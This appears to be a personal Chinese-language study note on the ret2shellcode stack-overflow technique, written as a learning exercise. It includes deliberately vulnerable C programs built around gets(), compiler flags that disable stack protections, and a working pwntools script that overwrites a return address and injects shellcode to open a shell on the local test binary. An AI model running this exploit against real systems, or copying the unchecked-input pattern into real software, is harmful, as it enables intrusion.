ret2shellcode

https://uuzdaisuki.com/2020/02/24/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2shellcode/

http://www.mi1k7ea.com/2019/03/03/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2shellcode/

https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#ret2shellcode

https://blog.csdn.net/m0_43405474/article/details/126546838

#include<string.h>
#include<stdlib.h>
char buf[128];

int func(){
	char msg[100];
	gets(msg);
	strcpy(buf,msg);
	puts(msg);
}
int main(){
	func();
}

gcc -g -fno-stack-protector -no-pie -z execstack -o test test.c

gcc -g -fno-stack-protector -no-pie -z execstack -z norelro -o test test.c
gcc -z execstack -no-pie -z norelro -fno-stack-protector test.c -o test

ret2shell这项技术的前提是需要操作系统关闭内存布局随机化（ASLR）以及需要程序调用栈有可执行权限。

上面这个不行，看下面的肖爷代码

#include <stdio.h>
#include <string.h>

int func(){
	char msg[100];
	printf("gift: %p\n", &msg);
	gets(msg);
}
int main(){
	func();
}

gcc -g -fno-stack-protector -no-pie -z execstack -z norelro -o test test.c

from pwn import *
context.log_level = "debug"
context.terminal = ["bash"]

p = gdb.debug("/home/pwn/06ret2shellcode/test","break main")
# p = process("/home/pwn/06ret2shellcode/test")

p.recvline()
gift = p.recvline().decode().strip().split(" ")[-1]
gift = int(gift, 16)
print(gift)

# payload = cyclic(0x70) + p64(gift + 0x70 + 0x08) + asm(shellcraft.amd64.linux.sh(),arch="amd64")
payload = flat([cyclic(0x70 + 0x08) , p64(gift + 0x70 + 0x08 + 0x08) , asm(shellcraft.amd64.linux.sh(),arch="amd64")])

p.sendline(payload)
p.interactive()

刚开始忘了填充rbp了。哦对，还有amd64那里。还有gdb.debug调试那里。都是坑